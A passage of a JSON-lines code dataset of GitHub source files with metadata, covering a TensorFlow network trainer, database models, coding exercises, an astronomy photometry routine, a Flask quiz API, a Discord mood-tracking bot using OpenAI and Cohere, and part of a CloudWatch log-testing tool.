forward neural network)\n l = X\n for i in range(self.nlayers-1):\n l = tf.add(tf.matmul(l, self.hidden_layer[i]['weights']), self.hidden_layer[i]['biases'])\n l = self.actf[i](l)\n if self.dropout[i]:\n l = tf.nn.dropout(l, self.keep_prob)\n\n output = tf.matmul(l, self.output_layer['weights']) + self.output_layer['biases']\n return output \n\n def train_and_test(self, X_train, y_train, X_test, y_test, keep_prob=1.0):\n #input\n # X_train: training features\n # y_train: training target\n # X_test: testing features\n # y_test: testing target\n # keep_prob: the keep probability for drop-out\n \n tf.global_variables_initializer().run(session=self.sess)\n cost_list = []\n test_cost_list = []\n\n # for each epoch\n for epoch in range(self.training_epochs):\n\n # calculate the number of data in each batch\n n_batch = int(self.n_samples / self.batch_size)\n\n # for each batch\n for i in range(n_batch):\n\n # calculate the offset and calculate features and target\n offset = (i * self.batch_size) % self.n_samples\n X_batch = X_train[offset:offset + self.batch_size, :]\n y_batch = y_train[offset:offset + self.batch_size]\n\n # run the optimizer\n self.sess.run(self.optimizer, feed_dict={self.X: X_batch, self.y: y_batch, self.keep_prob:keep_prob})\n\n # the last remaining data for the last batch\n if n_batch < self.n_samples:\n\n # calculate the offset and calculate features and target\n offset = n_batch * self.batch_size\n X_batch = X_train[offset:, :]\n y_batch = y_train[offset:]\n\n # run the optimizer\n self.sess.run(self.optimizer, feed_dict={self.X: X_batch, self.y: y_batch, self.keep_prob:keep_prob})\n\n # calculate the cost for training data set\n cost = self.sess.run(self.cost, feed_dict={self.X: X_train, self.y: y_train, self.keep_prob:keep_prob})\n\n # calculate the cost for testing data set\n test_cost = self.sess.run(self.cost, feed_dict={self.X: X_test, self.y: y_test, self.keep_prob:keep_prob})\n\n cost_list.append(cost)\n test_cost_list.append(test_cost)\n\n # Print informations at every 100 steps.\n if epoch % 100 == 0:\n sys.stdout.write(\"\\repoch = %d, cost = %f, test_cost = %f\" % (epoch, cost, test_cost))\n\n # output: prediction from testing features, training cost in a list, testing cost in a list\n return self.test(X_test), cost_list, test_cost_list\n\n #predict from testing data\n def test(self, X_test):\n if type(X_test) == pd.core.frame.DataFrame:\n X_test = X_test.values\n # For testing time, we need to keep drop-out to 0. In other words, keep_prob is 1.0\n return self.sess.run(self.MLP_model(X_test.astype(np.float32)), feed_dict={self.keep_prob:1.0})\n\n #calculate accuracy\n def accuracy(self, X_test, y_test, type=\"mean_absolute_error\"):\n if type == \"r2_score\":\n acc = r2_score(y_test, self.query(X_test))\n elif type == \"mean_absolute_error\":\n acc = mean_absolute_error(y_test, self.query(X_test))\n return acc\n\n","repo_name":"sunggeunkim/Machine-Learning-Trading","sub_path":"NeuralNetwork_Cross_Entropy_mini_batch.py","file_name":"NeuralNetwork_Cross_Entropy_mini_batch.py","file_ext":"py","file_size_in_byte":5966,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"66"} +{"seq_id":"4176068044","text":"from sqlalchemy import (\n create_engine,\n Column,\n Integer,\n String,\n Date,\n Boolean,\n ForeignKey,\n MetaData\n)\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import (\n sessionmaker,\n relationship\n)\n\n\ndef get_db_connection_url():\n from os import environ as env\n\n if env.get('ENGINE'):\n db_engine = env.get('ENGINE', 'postgres')\n db_name = env.get('POSTGRES_DB')\n host = env.get('POSTGRES_HOST', 'localhost')\n port = env.get('POSTGRES_PORT', '5432')\n user = env.get('POSTGRES_USER')\n password = env.get('POSTGRES_PASSWORD')\n\n return '{}://{}:{}@{}:{}/{}'.format(\n db_engine,\n user,\n password,\n host,\n port,\n db_name\n )\n\n else:\n return 'sqlite:///:memory:'\n\n\nBase = declarative_base()\n\nmetadata = MetaData()\n\n\nclass Profile(Base):\n __tablename__ = 'profile'\n\n id = Column('id', Integer, primary_key=True, autoincrement=True)\n firstname = Column('firstname', String(100))\n surname = Column('surname', String(100))\n user_id = Column('user_id', Integer, index=True, unique=True)\n birthdate = Column('birthdate', Date)\n gender = Column('gender', String(10))\n avatar = Column('avatar', String(200))\n\n def __repr__(self):\n return 'id=%s firstname=%s surname=%s' % (self.id, self.firstname, self.surname)\n\n\nclass Config(Base):\n __tablename__ = 'config'\n\n id = Column('id', Integer, primary_key=True)\n user_id = Column('user_id', Integer, index=True, unique=True)\n language = Column('language', String(5))\n dark_mode = Column('dark_mode', Boolean)\n\n","repo_name":"iliadmitriev/profile","sub_path":"profiles/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"74378705809","text":"from models.model import Model\nfrom sklearn.model_selection import train_test_split\n\nclass Separator(Model):\n\n def __init__(self, name=\"separator\", minimum=10, shuffle=True):\n super().__init__(name)\n self.ratio = {\n \"train\": 0.6,\n \"dev\": 0.2,\n \"test\": 0.2\n }\n self.minimum = minimum\n self.shuffle = shuffle\n self.X, self.y = [], []\n self.results = dict()\n\n def set_data(self, X, y):\n self.X, self.y = X, y\n\n def set_ratio(self, ratio):\n self.ratio = ratio\n\n def run(self):\n X_train, X_test, y_train, y_test = train_test_split(self.X, self.y, test_size=self.ratio[\"test\"], shuffle=self.shuffle, random_state=42)\n if \"dev\" in self.ratio: \n X_train, X_val, y_train, y_val = train_test_split(X_train, y_train, test_size=self.ratio[\"dev\"], shuffle=self.shuffle, random_state=42)\n self.results = {\n \"train\" : [X_train, y_train],\n \"dev\" : [X_val, y_val],\n \"test\" : [X_test, y_test]\n }\n else:\n self.results = {\n \"train\" : [X_train, y_train],\n \"test\" : [X_test, y_test]\n }\n if len(self.y) <= self.minimum:\n for key in self.results:\n self.results[key] = [self.X[:], self.y[:]]\n return self.results\n","repo_name":"lvhanh270597/predict-accent-vietnam","sub_path":"models/separate_data/separator.py","file_name":"separator.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"42602416760","text":"#coding=utf-8\n\"\"\"\n@athor:weifeng.guo \n@data:2018/11/12 16:27\n@filename:Bigger_Price\n\"\"\"\n\ndef bigger_price(num,list):\n list_1 = sorted(list, key=lambda list : list['price'], reverse=True)\n return (list_1[:num])\n\n\n\n\nbigger_price(2, [\n {\"name\": \"bread\", \"price\": 100},\n {\"name\": \"wine\", \"price\": 138},\n {\"name\": \"meat\", \"price\": 15},\n {\"name\": \"water\", \"price\": 1}\n])","repo_name":"guoweifeng216/pythonlearn","sub_path":"checkio/Bigger_Price.py","file_name":"Bigger_Price.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"11622870289","text":"# coding=utf8\nimport lldb\nfrom lldbsuite.test.lldbtest import *\nimport lldbsuite.test.lldbutil as lldbutil\nfrom lldbsuite.test.decorators import *\n\n\nclass TestUnicodeSymbols(TestBase):\n @skipIf(compiler=\"clang\", compiler_version=[\"<\", \"7.0\"])\n def test_union_members(self):\n self.build()\n spec = lldb.SBModuleSpec()\n spec.SetFileSpec(lldb.SBFileSpec(self.getBuildArtifact(\"a.out\")))\n module = lldb.SBModule(spec)\n self.assertTrue(module.IsValid())\n mytype = module.FindFirstType(\"foobár\")\n self.assertTrue(mytype.IsValid())\n self.assertTrue(mytype.IsPointerType())\n","repo_name":"llvm/llvm-project","sub_path":"lldb/test/API/lang/c/unicode/TestUnicodeSymbols.py","file_name":"TestUnicodeSymbols.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":22888,"dataset":"github-code","pt":"66"} +{"seq_id":"69913253970","text":"from sys import stdin\n\nt = int(input())\n\nfor _ in range(t):\n V, E, k = map(int, stdin.readline().split())\n edges = {v:[] for v in range(V)}\n for _ in range(E):\n s, e, w =map(int, stdin.readline().split())\n edges[e].append((s,w))\n\n dist = [[float('inf') for _ in range(k+1)] for _ in range(V)]\n for i in range(k+1):\n dist[0][i] = 0\n\n for i in range(1, k+1):\n for v in range(V):\n # curedges = [e for e in edges if e[1] == v]\n minimum = float('inf')\n for s, w in edges[v]:\n curdist = dist[s][i-1] + w\n if minimum > curdist:\n minimum = curdist\n if minimum == float('inf'):\n dist[v][i] = dist[v][i-1]\n else:\n dist[v][i] = minimum\n\n if dist[V-1][k] == float('inf'):\n print(\"NO\")\n else:\n print(dist[V-1][k]) \n ","repo_name":"jangyoojin/BOJ","sub_path":"PA4_shortest_kPath.py","file_name":"PA4_shortest_kPath.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"5764806114","text":"\n\"\"\" \nFind the Missing Element\n\nProblem\nConsider an array of non-negative integers. A second array is formed by shuffling the elements of the first array and deleting a random element. Given these two arrays, find which element is missing in the second array.\n\nHere is an example input, the first array is shuffled and the number 5 is removed to construct the second array.\n\nInput:\n\nfinder([1,2,3,4,5,6,7],[3,7,2,1,4,6])\n\nOutput:\n\n5 is the missing number\n\nSolution\nThe naive solution is go through every element in the second array and check whether it appears in the first array. Note that there may be duplicate elements in the arrays so we should pay special attention to it. The complexity of this approach is O(N^2), since we would need two for loops.\n\nA more efficient solution is to sort the first array, so while checking whether an element in the first array appears in the second, we can do binary search (we'll learn about binary search in more detail in a future section). But we should still be careful about duplicate elements. The complexity is O(NlogN).\n\n most interviews, you would be expected to come up with a linear time solution. We can use a hashtable and store the number of times each element appears in the second array. Then for each element in the first array we decrement its counter. Once hit an element with zero count that’s the missing element. Here is this solution: the first iterator is the missing element. This solution is also O(NlogN). Here is the solution for this approach: \"\"\"\n\n\n\"\"\" \n\n1. intiate the defaut dict\n 2. loop thru second array and create a hash table\n 3. loop thru first array and check if each element freqeuncy is 0, if so return \n else decrement the num\n\n \n \"\"\"\nimport collections\n\ndef finder(arr1, arr2):\n d = collections.defaultdict(int)\n\n for num in arr2:\n d[num] +=1\n \n for num in arr1:\n if d[num] == 0:\n return num\n else :\n d[num] -=1\n\n \n\nprint(finder([5,5,7,7],[5,7,7])) # 5\nprint(finder([1,2,3,4,5,6,7],[3,7,2,1,4,6])) # 5 \nprint(finder([9,8,7,6,5,4,3,2,1],[9,8,7,5,4,3,2,1])) # 6\nprint(finder([1, 4, 5, 7, 9], [4, 5, 7, 9])) #1\n","repo_name":"Vatsal272120/pythonProblems-","sub_path":"Arrays/FindingMissingElement.py","file_name":"FindingMissingElement.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"35279677172","text":"# Найдите сумму цифр трехзначного числа.\n\n# *Пример:*\n\n# 123 -> 6 (1 + 2 + 3)\n# 100 -> 1 (1 + 0 + 0) |\ns = input(\"Введите трехзначное число что бы найти сумму его чисел: \")\nnum = 0\nif len(s) == 3:\n for i in s:\n num += int(i)\n print(F\"Суммой трех чилес является: {num}\")\nelse:\n print(\"Это не трехзначное число\")","repo_name":"kopkan123/Domaha.py","sub_path":"dom1.py","file_name":"dom1.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"38194461567","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Mar 21 23:45:33 2021\n\n@author: Steven Hill\n\"\"\"\n\ndef ComputeNetRateJupiter(scidata,header,TargetIDs,SessionID,positions,radii):\n from photutils import CircularAperture\n from photutils import aperture_photometry\n from photutils import CircularAnnulus\n import Meta_and_Control_Data_Operations as Meta\n from astropy.table import Table, hstack\n import pylab as pl\n\n #Create aperture objects \n apertures = CircularAperture(positions, r=radii[0])\n annulus_apertures = CircularAnnulus(positions, r_in=radii[1], r_out=radii[2])\n\n #Compute raw fluxes\n rawflux_table = aperture_photometry(scidata, apertures)\n bkgflux_table = aperture_photometry(scidata, annulus_apertures)\n \n phot_table = hstack([rawflux_table, bkgflux_table], table_names=['raw', 'bkg'])\n bkg_mean = phot_table['aperture_sum_bkg'] / annulus_apertures.area()\n #print \"bkg_mean=\",bkg_mean\n bkg_sum = bkg_mean * apertures.area()\n #print \"bkg_sum=\",bkg_sum\n final_sum = phot_table['aperture_sum_raw'] - bkg_sum\n #print \"final_sum=\",final_sum\n rate=final_sum/header['EXPTIME']\n phot_table['net_count_rate'] = rate\n #print \"Raw=\",rawflux_table\n #print 'Bkg=',bkgflux_table\n phot_table['Target']=TargetIDs\n phot_table['Filter']=header['Filter']\n phot_table['Date-Obs']=header['MIDPOINT']\n phot_table['SessionID']=SessionID\n phot_table.remove_column('id_bkg')\n phot_table.remove_column('xcenter_bkg')\n phot_table.remove_column('ycenter_bkg')\n #print phot_table\n Filter=Meta.FilterParameters(header['FILTER'])\n WVCenter=Filter.CenterWV###Testing Area\n \n \"\"\"\n #Code to display diagnostic plots (not yet finished):\n \n pl.figure(figsize=(6,4), dpi=150, facecolor=\"white\")\n pl.imshow(scidata)\n ap_patches = apertures.plot(color='white', lw=0.5,\n label='Photometry aperture')\n ann_patches = annulus_apertures.plot(color='red', lw=0.5,\n label='Background annulus')\n #labels = (ap_patches[0], ann_patches[0])\n #pl.legend(font=10)\n \"\"\"\n return rate,WVCenter,phot_table\n\ndef uniform_lat_grid(Latitude,Signal,Fine=False):\n \"\"\"\n Takes an existing latitude profile on a non-standard or even irregular\n grid and performs linear interpolation to place the data\n on one of two uniform grids:\n 1) -90 to 90 with 1 deg bins\n 2) -90 to 90 with 2 deg bins\n \"\"\"\n import numpy as np\n from scipy import interpolate\n\n if Fine: #Set grid interval\n dlat=1.0\n else:\n dlat=2.0\n\n LatGrid=np.arange(-90.,90.1,dlat,dtype=float)\n #print Wavelength.size,Signal.size \n Interp=interpolate.interp1d(Latitude,Signal,kind='linear', \n copy=True,bounds_error=False, \n fill_value=np.NaN,axis=0) \n SignalonGrid=Interp(LatGrid)\n\n return LatGrid,SignalonGrid","repo_name":"smhill001/Jupiter_NH3_Analysis","sub_path":"ComputeNetRateJupiter.py","file_name":"ComputeNetRateJupiter.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"28849097743","text":"class Solution:\n def minCostToMoveChips(self, position: List[int]) -> int:\n '''\n Idea: Move all even positioned chips to 0, i.e., count them and \n all odd positioned chips to 1, i.e., count them; take min of two counts\n T: O(n) and S: O(1)\n '''\n zeroCost, oneCost = 0, 0\n for i in range(len(position)):\n if position[i] % 2:\n oneCost += 1\n else:\n zeroCost += 1\n \n return min(zeroCost, oneCost)\n","repo_name":"shoaibur/Software-Engineering","sub_path":"Leetcoding-Actions/Explore-Monthly-Challenges/2020-11/05-Minimum-Cost-to-Move-Chips-to-the-Same-Position.py","file_name":"05-Minimum-Cost-to-Move-Chips-to-the-Same-Position.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"12826349315","text":"from pathlib import Path\r\nimport random\r\nimport time\r\nfrom subprocess import call\r\n\r\nnodeCount = 10\r\nrunningNodes = 10\r\nsleepTime = 15\r\nstoragePath = \"/home/thameera/Distributed/python\"\r\nnodePropertiesPath = \"\"\r\nport = 1235\r\ncontent = [ \"Adventures of Tintin\", \"Jack and Jill\", \"Glee\", \"The Vampire Diarie\", \"King Arthur\", \"Windows XP\", \"Harry Potter\", \"Kung Fu Panda\", \"Lady Gaga\", \"Twilight\", \"Windows 8\", \"Mission Impossible\", \"Turn Up The Music\", \"Super Mario\", \"American Pickers\", \"Microsoft Office 2010\", \"Happy Feet\", \"Modern Family\", \"American Idol\", \"Hacking for Dummies\"]\r\n\r\ndef createNodes(nodeCount, storagePath, nodePropertiesPath, port, content):\r\n for i in range(nodeCount):\r\n i+=1\r\n Path(storagePath + \"/node%s/local_storage\"%i).mkdir(parents=True, exist_ok=True)\r\n Path(storagePath + \"/node%s/cache_storage\"%i).mkdir(parents=True, exist_ok=True)\r\n with open(nodePropertiesPath + \"node%s.properties\" % i, \"w\") as f:\r\n f.write(\"cache_dir=%s/node%s/cache_storage\\nlocal_dir=%s/node%s/local_storage\\ncache_size=10000000\\nport=%s\\nboostrap_server_ip=127.0.0.1\\nboostrap_server_port=55555\" % (storagePath, i, storagePath, i, i+port))\r\n with open(storagePath + \"/node%s/local_storage/filelist.txt\"%i, \"w\") as f:\r\n randomContent = random.sample(content, random.randrange(len(content)))\r\n for k in randomContent:\r\n f.write(\"%s\\n\"%k)\r\n open(storagePath + \"/node%s/cache_storage/filelist.txt\"%i, \"w\")\r\n\r\ndef runNodes(runningNodes, sleepTime):\r\n for i in range(runningNodes):\r\n i+=1\r\n call(['gnome-terminal', '--tab', '-e', 'java -jar p2pFileTransfer-0.0.1-SNAPSHOT.jar node%s.properties'%i])\r\n time.sleep(sleepTime)\r\n\r\ncreateNodes(nodeCount, storagePath, nodePropertiesPath, port, content)\r\nrunNodes(runningNodes, sleepTime)\r\n","repo_name":"KalanaDananjaya/distributed-content-search","sub_path":"Python create nodes/create_nodes.py","file_name":"create_nodes.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"35848910465","text":"# -*- coding: utf-8 -*-\n\n__title__ = 'pydsm'\n__version__ = '0.1'\n__author__ = 'Jimmy Callin'\n\nimport pickle\nimport bz2\nfrom pydsm.model import CooccurrenceDSM\nfrom pydsm.model import RandomIndexing\nfrom pydsm.indexmatrix import IndexMatrix\n\n\ndef load(filepath):\n return pickle.load(bz2.open(filepath, 'rb'))\n\n\ndef build(model,\n corpus,\n config=None,\n **kwargs):\n \"\"\"\n Builds a distributional semantic model.\n Parameters:\n model: A semantic model class.\n Available models:\n CooccurrenceDSM\n RandomIndexing\n corpus: Either a path to file or an iterable.\n\n Returns: A DSM.\n \"\"\"\n if config is None:\n config = {}\n config = dict(config, **kwargs)\n return model(corpus=corpus, **config)","repo_name":"jimmycallin/pydsm","sub_path":"pydsm/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":84,"dataset":"github-code","pt":"53"} +{"seq_id":"24850197176","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# DecisionTreeOnStudent1.py BY Eric USING PyCharm\n# AT 2019/12/23 16:45\n# TOPIC :\n\nfrom sklearn.ensemble import RandomForestClassifier\nimport pandas as pd\nif __name__ == '__main__':\n clf = RandomForestClassifier(random_state=0)\n df = pd.read_csv(r'student_en.csv')\n mylist = df.values.tolist()\n X = []\n y = []\n for i in mylist:\n y.append(i.pop())\n X.append(i)\n clf.fit(X, y)\n print(clf.predict([[1,0,0,3,0,0,0,2]]))","repo_name":"PearlyWave/LearnDecisionTree","sub_path":"DecisionTreeOnStudent1.py","file_name":"DecisionTreeOnStudent1.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26587334551","text":"from venv import create\nimport discord\nimport os\nfrom dotenv import load_dotenv\nfrom bot_database import create_db, log_message, get_all_messages_past_x_hours, log_reminder, get_reminder\nfrom datetime import datetime\nimport math\nimport openai\nimport numpy as np\nimport random\nfrom cohere_engine import generate, classify\nfrom numpy_preprocess import adapt_array\nfrom mood_time_series import predict_mood\n\nload_dotenv()\nMOOD = ['sad', 'angry', 'curious', 'disgusted', 'fearful', 'happy', 'neutral', 'surprised']\nHOURS = 2\n\n\nmode = \"mood\"\n\ndef get_gpt3_message(message):\n openai.api_key = os.getenv(\"OPENAI_API_KEY\")\n data = openai.Completion.create(\n model=\"text-davinci-002\",\n prompt=message,\n max_tokens=100,\n temperature=1.0,\n presence_penalty=2.0,\n frequency_penalty=2.0\n )\n return data.to_dict()[\"choices\"][0][\"text\"].strip(\"\\n\")\n\ndef get_convo_reply(message):\n openai.api_key = os.getenv(\"OPENAI_API_KEY\")\n data = openai.Completion.create(\n model=\"text-davinci-002\",\n temperature=0.9,\n max_tokens=150,\n prompt=f\"Human: {message} \\nAI:\",\n top_p=1,\n frequency_penalty=0.0,\n presence_penalty=0.6,\n stop=[\" Human:\", \" AI:\"]\n )\n # print(data)\n return data.to_dict()[\"choices\"][0][\"text\"].strip(\"\\n\")\n \ndef suggest_activity(author_id):\n messages = get_all_messages_past_x_hours(author_id, HOURS)\n data = [apply_sigmoid(msg) for msg in messages]\n # print(data)\n moods, _ = predict_mood(data)\n idx = (-moods).argsort()[:3] #indices of largest to smallest\n moods_top_3 = [MOOD[i] for i in idx]\n for i in idx:\n if moods[i] < 1/5:\n moods_top_3.remove(MOOD[i])\n ret_messages = []\n for mood in moods_top_3:\n if mood not in [\"curious\", \"neutral\", \"surprised\"]:\n ret_messages.append(get_gpt3_message(f\"Write a suggestion to promote mental health for a worker who is feeling {mood} while at work\"))\n return ret_messages\n\ndef apply_sigmoid(message):\n return (2.5 / (1 + np.exp(-(message[1]-2/3*HOURS*3600)/(HOURS*3600/16))))*message[2]\n\nclass MyClient(discord.Client):\n def __init__(self, intents=discord.Intents.default()):\n intents.message_content = True\n super().__init__(intents=intents)\n\n async def on_ready(self):\n print(f'Logged on as {self.user}!')\n\n async def on_message(self, message):\n # print(dir(message), message.author, message.content)\n if message.author != self.user:\n author_id = message.author.id\n global mode\n if mode == \"mood\":\n if message.content.startswith('!mood'):\n messages = get_all_messages_past_x_hours(str(author_id), HOURS) # returns a list of messages, more recent = bigger value for message[1]\n if len(messages) == 0:\n await message.channel.send(f\"You haven't sent any messages in the last {HOURS} hours. Please send some messages to get started.\")\n return\n data = [apply_sigmoid(msg) for msg in messages]\n # print(data)\n mood, prediction = predict_mood(data)\n # await message.channel.send(f\"**{message.author}**, your mood right now: {mood}\")\n # await message.channel.send(result[0])\n\n embedOptions = {\n \"title\": \"Mood checker\",\n \"type\": \"rich\",\n \"color\": 2899536,\n \"description\": f\"**{message.author}'s** mood right now: {prediction}\",\n \"timestamp\": str(datetime.utcnow())\n }\n \n embed = discord.Embed.from_dict(embedOptions)\n embed.add_field(name='\\U0001F622', value=f'{round(mood[0] * 100)}%', inline=True)\n embed.add_field(name='\\U0001F621', value=f'{round(mood[1] * 100)}%', inline=True)\n embed.add_field(name='\\U0001F9D0', value=f'{round(mood[2] * 100)}%', inline=True)\n embed.add_field(name='\\U0001F92E', value=f'{round(mood[3] * 100)}%', inline=True)\n embed.add_field(name='\\U0001F628', value=f'{round(mood[4] * 100)}%', inline=True)\n embed.add_field(name='\\U0001F600', value=f'{round(mood[5] * 100)}%', inline=True)\n embed.add_field(name='\\U0001F610', value=f'{round(mood[6] * 100)}%', inline=True)\n embed.add_field(name='\\U0001F62F', value=f'{round(mood[7] * 100)}%', inline=True)\n embed.add_field(name='** **', value='** **', inline=True)\n await message.channel.send(embed=embed, content=None)\n elif message.content.startswith(\"!suggest\"):\n bot_msg = await message.channel.send(\"IntelliCord is thinking...\")\n messages = suggest_activity(author_id)\n embed_options = {\"title\": f\"IntelliCord Suggestions\", \"type\": \"rich\", \"color\": 2899536, \"timestamp\": str(datetime.utcnow())}\n embed = discord.Embed.from_dict(embed_options)\n for i, msg in enumerate(messages):\n embed.add_field(name=f\"Suggestion {i+1}\", value=msg)\n await bot_msg.edit(embed=embed, content=None)\n elif message.content.startswith(\"!convo\"):\n mode = \"convo\"\n await message.channel.send(\"Changing into convo mode. What are you thinking right now?\")\n else:\n create_db(str(author_id)) # can log existing users a do a check if that user exists\n time_count = datetime.now() - datetime(2022, 8, 19, 0, 0, 0)\n second_count = math.floor(time_count.total_seconds())\n # print(second_count)\n classification = classify(message.content)\n # print(classification)\n log_message(str(author_id), message.content, second_count, adapt_array(classification))\n messages = get_all_messages_past_x_hours(str(author_id), HOURS) \n data = [apply_sigmoid(msg) for msg in messages]\n mood, prediction = predict_mood(data)\n\n author = message.author.display_name\n msg = None\n mood_ = \"\"\n if (mood[0] >= 0.5):\n mood_ = MOOD[0]\n msg = f\"It seems you are very sad right now, {author}. Hey @everyone, your teammate {author} seems to be really {MOOD[0]}. As {author}'s teammate, you can help :)\"\n elif (mood[1] >= 0.7):\n mood_ = MOOD[1]\n msg = f\"Take a breath and calm down, {author}. Hey @everyone, your teammate {author} is {MOOD[1]} right now. As {author}'s teammate, you can calm him/her down :)\"\n elif (mood[4] >= 0.7):\n mood_ = MOOD[4]\n msg = f\"Why are you scared, {author}?. If you are in danger, please seek help from your teammate.\"\n \n if (msg != None):\n reminder = get_reminder(str(author_id), mood_)\n if (len(reminder) == 0):\n await message.channel.send(msg)\n time_count = datetime.now() - datetime(2022, 8, 19, 0, 0, 0)\n second_count = math.floor(time_count.total_seconds())\n log_reminder(str(author_id), mood_, second_count)\n else:\n tell_joke = random.random() > 0.8\n if (mood_ == \"sad\" and tell_joke):\n joke = get_gpt3_message(\"Tell me a random joke\")\n msg = \"Let me make you feel better: \"\n await message.channel.send(joke)\n elif mode == \"convo\":\n if message.content.startswith(\"!exit\"):\n mode = \"mood\"\n await message.channel.send(\"Returning to mood checker\")\n else:\n reply = get_convo_reply(message.content)\n await message.channel.send(reply)\n \n\n\n\ndef main():\n client = MyClient()\n client.run(os.getenv('TOKEN'))\n # openai.organization = \"org-egOUH3FiN9wJSzhHqGGRoZXO\"\n openai.api_key = os.getenv(\"OPENAI_API_KEY\")\n\nif __name__ == '__main__':\n main()","repo_name":"Nicholas-Sidharta12365/HT6ix-2022","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":8642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18653776689","text":"import numpy as np\n\nweights = np.array([[1, 2, 3, 4], [2, 3, 4, 5], [3, 4, 5, 6]])\nbatch_x = np.array([[1, 2, 3, 4], [2, 2, 2, 2]])\nbatch_y = np.array([[1, 2, 1], [2, 3, 2]])\nbias = np.array([1, 1, 1])\na = np.vstack([np.dot(weights, x)+bias for x in batch_x])\n# print(a)\na_minus_y = a - batch_y\nprint(batch_x)\nprint(a_minus_y)\n\nret = np.array([np.tensordot(minus, x, axes=0) for minus, x in zip(a_minus_y, batch_x)])\nprint(ret)\nprint(ret.mean(axis=0))\n\n\n\n","repo_name":"BridgeMia/NLPHOMEWORK","sub_path":"text_classification/numpy_test_pad.py","file_name":"numpy_test_pad.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33944285554","text":"from flask import Blueprint, jsonify # jsonify creates an endpoint response object\nfrom flask_restful import Api, Resource # used for REST API building\nimport requests # used for testing \nimport random\n\nfrom model_SATquiz import *\n\nSATquiz_api = Blueprint('SATquiz_api', __name__,\n url_prefix='/api/SATquiz')\n\napi = Api(SATquiz_api)\n\nclass QuestionsAPI:\n # not implemented\n class _Create(Resource):\n def post(self, question):\n pass\n \n # getJokes()\n class _Read(Resource):\n def get(self):\n return jsonify(getSAT())\n\n # getJoke(id)\n class _ReadID(Resource):\n def get(self, id):\n return jsonify(getSAT(id))\n\n # getRandomJoke()\n class _ReadRandom(Resource):\n def get(self):\n return jsonify(getRandomQuestion())\n \n # getRandomJoke()\n class _ReadCount(Resource):\n def get(self):\n count = countQuestion()\n countMsg = {'count': count}\n return jsonify(countMsg)\n\n api.add_resource(_Create, '/create/')\n api.add_resource(_Read, '/')\n api.add_resource(_ReadID, '/')\n api.add_resource(_ReadRandom, '/random')\n api.add_resource(_ReadCount, '/count')\n\nif __name__ == \"__main__\": \n # server = \"http://127.0.0.1:5000\" # run local\n server = 'http://127.0.0.1:5000/' # run from web\n url = server + \"/api/SATquiz\"\n responses = [] # responses list\n\n count_response = requests.get(url+\"/count\")\n count_json = count_response.json()\n count = count_json['count']\n\n num = str(random.randint(0, count-1)) # test a random record\n responses.append(\n requests.get(url+\"/\"+num) # read joke by id\n ) \n \n responses.append(\n requests.get(url+\"/random\") # read a random joke\n ) \n\n # cycle through responses\n for response in responses:\n print(response)\n try:\n print(response.json())\n except:\n print(\"unknown error\")","repo_name":"Firestorm0986/PBLproject","sub_path":"api/SATquiz.py","file_name":"SATquiz.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42069780251","text":"#!/usr/bin/env python3\n\"\"\"\nCommand line interface for the log testing scripts.\n\nWhen new formats are added to put_cloudwatch_logs, add them to the long_options list,\nand add a short single letter version to the format argument's `choices` list.\n\nNote that the way it works right now, two different formats MUST NOT start with\nthe same first letter. If that happens, the main() function must be modified.\n\"\"\"\n\nimport os\nimport sys\nfrom datetime import datetime\nfrom pprint import pprint\nfrom time import sleep\n\nimport click\n\nfrom cybersecuritytools.splunk.credentials import credentials\nfrom cybersecuritytools.splunk.search import Search\n\nfrom .put_cloudwatch_logs import send_logs_to_cloudwatch, setup_cloudwatch_log_groups\nfrom .query_splunk import load_test_found, payload_found, search_query\n\n\n@click.group()\ndef generate_cloudwatch_logs() -> None:\n pass\n\n\n@generate_cloudwatch_logs.command()\n@click.option(\"-d\", \"--destination-arn\", required=True, type=str)\n@click.option(\"-r\", \"--role-arn\", required=True, type=str)\ndef create_log_groups(destination_arn: str, role_arn: str) -> None:\n setup_cloudwatch_log_groups(dest_arn=destination_arn, role_arn=role_arn)\n\n\n@generate_cloudwatch_logs.command()\ndef send_logs() -> None:\n \"\"\"Send test data to Cloudwatch log-groups based on selected format.\"\"\"\n send_logs_to_cloudwatch()\n\n\n@generate_cloudwatch_logs.command()\n@click.option(\"-t\", \"--timeout\", type=int, default=600)\n@click.option(\"--ssm\", required=True, help=\"SSM 